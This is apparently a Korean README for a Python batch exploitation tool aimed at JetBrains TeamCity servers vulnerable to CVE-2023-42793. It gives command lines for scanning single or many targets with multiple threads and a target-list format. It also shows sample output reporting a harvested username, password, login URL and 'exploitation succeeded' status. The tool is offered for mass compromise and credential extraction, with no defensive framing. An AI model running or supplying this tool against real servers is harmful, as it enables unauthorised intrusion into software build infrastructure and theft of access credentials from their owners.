
JetBrains TeamCity 서버를 대상으로 하는 CVE-2023-42793용 배치 취약점 스캐너. 여러 호스트에서 자격 증명 추출 및 로그인 URL 검색을 자동화합니다.
# 대량 스캔
python teamcity_scan.py -f targets.txt -o results.txt
# 단일 대상
python teamcity_scan.py -u http://target.com:8111 -o result.txt
# 스레드 수 지정
python teamcity_scan.py -f urls.txt -t 20 -o vuln.txt
대상 파일 형식 (targets.txt):
http://192.168.1.100:8111
https://teamcity.example.com
10.0.0.1:8111
example.com
출력 형식 (results.txt):
대상: http://192.168.1.100:8111
사용자 이름: TeamCityUser1234
비밀번호: TeamCity@2023
로그인 주소: http://192.168.1.100:8111/login.html
상태: 취약점 악용 성공